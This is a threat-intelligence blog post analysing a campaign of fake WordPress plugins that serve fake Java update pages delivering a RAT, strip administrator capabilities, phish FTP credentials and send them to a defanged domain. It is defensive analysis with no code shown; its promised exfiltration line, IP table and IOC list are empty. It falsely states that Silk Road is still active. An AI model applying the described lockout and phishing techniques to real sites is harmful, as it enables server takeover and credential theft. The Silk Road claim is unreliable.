Analyzing the 'Fake Browser Updates plugin' Campaign: A Deeper Dive

Sucuri recently published an excellent analysis detailing a pervasive campaign involving a malicious "fake plugin" targeting WordPress sites. This campaign exploits vulnerable installations to inject code to render Fake Browser Update pages to WordPress Administrators. As a follow-up to their initial report, I decided to pull some threads on the identified indicators of compromise (IOCs), specifically focusing on the IP addresses involved and the other malicious payloads they were simultaneously distributing.

‍

The Threat Vector: Fake modern-recent-posts & compromised credentials

The core of this attack relies on compromised credentials (harvested from the large credentials database lists ) to install a seemingly legitimate but maliciously compromised plugin file. As reported by Sucuri, once active, the plugin downloads and executes a javascript from persistancejs[.]store which is ONLY visible to WordPress Administrators. The fake plugin uses the User-Agent to decide which type of payload will show to the victim. 

‍
Once the payload is acquired, this fake plugin renders a fake browser update page within the WordPress Admin interface which tells the victim to update Java. Once the button is clicked, it downloads an installer.exe from the malicious website: secure-java-update[.]com. This file will infect the Windows computer of the victim with a Remote Access Trojan which is commonly referred to as RAT.

Luckily at the time of this writing the domain secure-java-update[.]com has already been taken down. 

‍

Tracking the Attack Infrastructure

Leveraging our Threat Shield technology, which allows us to have unique traceability over actions performed within the PHP engine, I was able to observe the traffic originating from the initially identified IPs and several previously unassociated but clearly related fake plugins that those IPs were also pushing. 

‍

IP Address Analysis and Observed Activity

The following table summarizes the key IP addresses observed during the analysis period and the types of malicious activity recorded from each:

‍

Beyond the Plugin: The Secondary Payload Menagerie

What's particularly concerning is that the infrastructure pushing the "fake plugin" isn't dedicated solely to this campaign. The associated IPs are multi-tasking, acting as launchpads for a variety of other fake plugins which I will describe below:

secwp or wpsecurity

This other fake plugin has two variations one that is not stealing credentials or showing fake updates, instead it injects on the footer of the website links to online black markers (usually referred as darknet market) such as Silk Road, which was the first one that ever emerged and that remains active up to this day.

‍

The other variation that I found was more dangerous as it can lock the legitimate administrator out and trick them into handing over their FTP/Server credentials to an external attacker. Let's review each capability further.

‍

Locking the Administrator (The "Lockout")

The script strips the site administrator of almost all their powers:

• Capability Stripping: It uses filter_user_caps to set almost all important permissions (like install_plugins, edit_themes, manage_options) to false.
• Redirect Loop: It uses redirect_admin_to_security_page to force the admin away from any useful dashboard page and onto a fake "Security Update" page.
• Password Protection: It blocks the admin from changing their own password via block_admin_password_change_via_admin.
• Stealth: It hides itself from the plugin list (filter_all_plugins) so you can't see it running in the dashboard.

‍

The Phishing Page (The "Security Update")

The script creates a fake menu page called security_update. When the victim visits it, they see a message: "Critical WordPress Update."

• It uses the built-in WordPress function request_filesystem_credentials.
• This triggers a standard-looking WordPress popup asking for your FTP Host, Username, and Password. Because it looks like a native WordPress prompt, users are likely to trust it.

‍

Data Exfiltration (The "Theft")

Once the victim enters their FTP credentials, the script executes this line:

This sends this data to a remote server (onion[.]repair), giving the attacker full access to the web server files.

‍

Indicators of Compromise (IOCs)

The following technical data has been compiled to help security researchers and WordPress administrators identify, track, and mitigate this specific threat. Below, you will find a comprehensive list of the network infrastructure, malicious domains, and file signatures associated with this campaign. We recommend cross-referencing these indicators with your server logs and implementation of firewall blocks for the listed IP addresses to prevent further communication with the attacker's infrastructure.

‍

Note: The specific IP addresses provided above are the ones observed during the investigation. Specific, actionable IPs should be validated with your threat intelligence feeds.